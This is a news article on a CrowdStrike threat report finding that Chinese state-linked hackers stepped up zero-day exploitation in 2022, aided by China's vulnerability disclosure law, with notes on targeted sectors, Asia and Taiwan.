Chinese State Hackers Level Up Their Abilities: Crowdstrike
Critical Infrastructure Security , Cybercrime as-a-service , Cyberwarfare / Nation-State Attacks
Beijing Looks for Enterprise Software Zero Days Akshaya Asokan (asokan_akshaya) • February 28, 2023 Image: Shutterstock
A Chinese law requiring mandatory disclosure to the government of vulnerability reports appears to be paying dividends for state-connected hacking.
See Also: OnDemand | Navigating the Difficulties of Patching OT
Chinese hackers with a connection to Beijing ramped up their use of zero day vulnerabilities when attacking North American targets during 2022, says threat intelligence firm Crowdstrike.
The disclosure requirement which took effect in September 2021, “is effectively crowdsourcing vulnerability research in China,” said Adam Meyers, senior vice president of intelligence at CrowdStrike.
“With this program, the Chinese government is up-levelling their capabilities,” Meyers told Information Security Media Group ahead of the company’s release of an annual assessment of the global threat landscape.
Crowdstrike’s assessment matches the conclusions of other companies, including Microsoft, which in November also found an increased use of zero-day exploitation by state hackers (see: China Likely Amasses 0-Days Via Vulnerability Disclosure Law).
Among the most commonly exploited vulnerabilities by Chinese hackers were flaws affecting Citrix Gateway, tracked as CVE-2022-27518; Microsoft Exchange Server, tracked CVE-2022-41040; and Log4Shell. The main targets were the American defense and telecommunications sectors, civil society, and pharmaceutical industries.
The company also highlights exploitation “consistent with China-nexus activity” of CVE-2022-29464, a flaw in WSO2 products that allowed hackers to reach into cloud computing infrastructure.
“There is increasing evidence that adversaries are growing more confident leveraging traditional endpoints to pivot to cloud infrastructure. The reverse is also true: Cloud infrastructure is being used as a gateway to traditional endpoints,” the report states.
The shift to exploits against which software companies had yet to develop a patch or only recently made it available marks a shift from previously observed techniques associated with these groups such as spear-phishing or credential theft to gain initial access.
If there’s any consolidation for North American cyber defenders contained in the Crowdstrike report, it’s that Chinese-state connected hackers’ primary targets were organizations in Asia, primarily the government, technology and telecommunications sectors.
“Intrusions in these regions accounted for roughly two-thirds of the China-nexus targeted intrusion activity CrowdStrike Intelligence confirmed in 2022,” the report states. That finding also tracks with other threat intelligence, including IBM, which found that the Asia-Pacific region accounted for nearly a third of all incidents it monitored in 2022 (see: Asia-Pacific Faced the Highest Share of Cyberattacks in 2022).
Taiwan absorbed a hefty amount of Chinese state-directed hacking, a development Crowdstrike says is likely fuelled by economic espionage. The operations may nonetheless support Beijing’s desire for “unification” with Taiwan, given the People’s Republic of China’s aggressive assertions of sovereignty over the island nation.
The pace of Chinese state hacking nevertheless did not increase before or after then U.S. Speaker of the House Nancy Pelosi’s visit to Taiwan, during which she declared solidarity with Taipei.
Taiwanese government sites did experience distributed denial of service attacks in the lead up to Pelosi’s visit, but that activity was “Chinese-affiliated nationalist hacktivist activity” rather than state-directed, Crowdstrike says.